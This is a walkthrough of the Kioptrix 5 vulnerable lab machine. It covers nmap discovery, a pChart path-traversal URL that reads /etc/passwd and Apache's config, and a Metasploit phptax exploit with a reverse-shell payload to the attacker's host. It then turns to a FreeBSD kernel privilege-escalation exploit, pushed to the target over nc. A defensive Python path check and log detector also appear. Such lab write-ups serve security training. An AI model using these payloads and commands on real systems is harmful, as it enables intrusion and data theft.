Kioptrix 5 penetration walkthrough

Table of contents

Information gathering

1. Host discovery scan

2. Port scan

3. Service scan

Web penetration:

Visiting port 8080:

Visiting port 80:

Vulnerability search:

Building the URL:

Searching for phptax vulnerabilities:

One-shot with msf

Privilege escalation:

Finding a privilege-escalation exploit:

Downloading the exploit:

Uploading to the target:

Upload via nc:

Information gathering

1. Host discovery scan

nmap -sn 192.168.126.1/24

└─# nmap -sn 192.168.126.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-01 21:34 EST
Nmap scan report for 192.168.126.1
Host is up (0.00059s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.126.2
Host is up (0.00035s latency).
MAC Address: 00:50:56:E5:B1:08 (VMware)
Nmap scan report for 192.168.126.146  // target host found
Host is up (0.00091s latency).
MAC Address: 00:0C:29:2F:71:EF (VMware)
Nmap scan report for 192.168.126.254
Host is up (0.00046s latency).
MAC Address: 00:50:56:E3:46:91 (VMware)
Nmap scan report for 192.168.126.145
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.21 seconds

2. Port scan

nmap -sT -p- 192.168.126.146

└─# nmap  -sT -p- 192.168.126.146   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-01 21:35 EST
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 81.41% done; ETC: 21:37 (0:00:20 remaining)
Nmap scan report for 192.168.126.146
Host is up (0.00080s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 00:0C:29:2F:71:EF (VMware)

3. Service scan

nmap -sT -sV --version-all -O 192.168.126.146 -p 22,80,8080

└─# nmap -sT -sV --version-all -O 192.168.126.146 -p 22,80,8080
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-01 21:38 EST
Nmap scan report for 192.168.126.146
Host is up (0.00058s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:2F:71:EF (VMware)
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
No OS matches for host
Network Distance: 1 hop

Web penetration:

Visiting port 8080:

Denied

Visiting port 80:

Viewing the page source reveals some information:

Trying to access it:

Vulnerability search:

Found the matching exploit script; the version matches, and it is a path traversal vulnerability.

Building the URL:

http://192.168.126.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

We can see that the operating system is FreeBSD 9.0, with the root-privileged users root and toor and the regular users ossec, ossecm and ossecr. Searching for the Apache configuration file path on FreeBSD gives the default path: /usr/local/etc/apache22/httpd.conf

This gives the URL:

http://192.168.126.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

At the very end you can see that the user agent permitted to access port 8080 is Mozilla/4.0 Mozilla4_browser

We capture the request with Burp Suite and modify the User-Agent accordingly

Visiting again, the content turns out to be nothing useful:

Searching for phptax vulnerabilities:
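The defender's side of the traversal above, as an added illustration that is not part of the original write-up or the pChart project: a path check that would have rejected the `Script` value used here, plus a detector for the same request pattern in Apache access logs. The web root path and the log lines are constructed assumptions.

```python
import os
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed web root for the pChart examples directory (constructed, not from the target).
WEB_ROOT = "/usr/local/www/apache22/data/pChart2.1.3/examples"

def resolve_script(script_param: str, root: str = WEB_ROOT) -> Optional[str]:
    """Hardened replacement for handing ?Script=... straight to a file read.

    Decodes the value (the request above relies on %2f-encoded slashes), joins it
    under the examples directory, normalises away ".." and refuses anything that
    leaves the directory. Returns the safe absolute path, or None to reject.
    """
    decoded = unquote(script_param)
    # Drop a leading separator so "/etc/passwd" cannot become an absolute path.
    candidate = os.path.normpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

# ".." as a whole path component, in either separator style.
TRAVERSAL_RE = re.compile(r"(^|[/\\])\.\.([/\\]|$)")

def flag_traversal(log_line: str) -> bool:
    """True when an Apache combined-format line carries '..' in any query value."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', log_line)
    if not m:
        return False
    query = parse_qs(urlsplit(m.group(1)).query)
    for values in query.values():
        for v in values:
            # Decode once more: double-encoded "%252e%252e%252f" is a common evasion.
            if TRAVERSAL_RE.search(unquote(v)):
                return True
    return False

# Constructed sample lines modelled on the request in this write-up.
SAMPLE_LOG = [
    '192.168.126.145 - - [01/Jan/2024:21:40:01 -0500] "GET /pChart2.1.3/examples/index.php'
    '?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1337 "-" "Mozilla/5.0"',
    '192.168.126.145 - - [01/Jan/2024:21:40:05 -0500] "GET /pChart2.1.3/examples/index.php'
    '?Action=View&Script=example.drawBar.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print("TRAVERSAL" if flag_traversal(line) else "ok", line[:80])
```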

searchsploit phptax

└─# searchsploit phptax      
--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)                                     | php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution                                  | php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                                                 | php/webapps/21665.txt
--------------------------------------------------------------------------------------------------- ---------------------------------

Found 3 PoCs

One-shot with msf

msfconsole

use exploit/multi/http/phptax_exec

show options

set rhosts 192.168.126.146

set rport 8080

show payloads

set payload cmd/unix/reverse

set lhost 192.168.126.145

set useragent Mozilla/4.0 Mozilla4_browser

run

Final settings:

Successfully obtained a shell as www

Privilege escalation:

uname -a

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

Finding a privilege-escalation exploit:

searchsploit FreeBSD 9.0
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation                              | freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation                        | freebsd/local/26368.c
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Downloading the exploit:

searchsploit -m 28718.c
  Exploit: FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation
      URL: https://www.exploit-db.com/exploits/28718
     Path: /usr/share/exploitdb/exploits/freebsd/local/28718.c
    Codes: CVE-2012-0217, OSVDB-82949
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/28718.c

Uploading to the target:

kali: start an HTTP server

┌──(root㉿kali)-[/home/kali/Desktop/k5]
└─# ls
28718.c
                                                                                                                      
┌──(root㉿kali)-[/home/kali/Desktop/k5]
└─# python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

target: download with wget

... the target does not have wget installed; trying another method

Upload via nc:

kali: nc -lvnp 8888 <28718.c

target: nc -nv 192.168.126.145 8888 > 28718.c
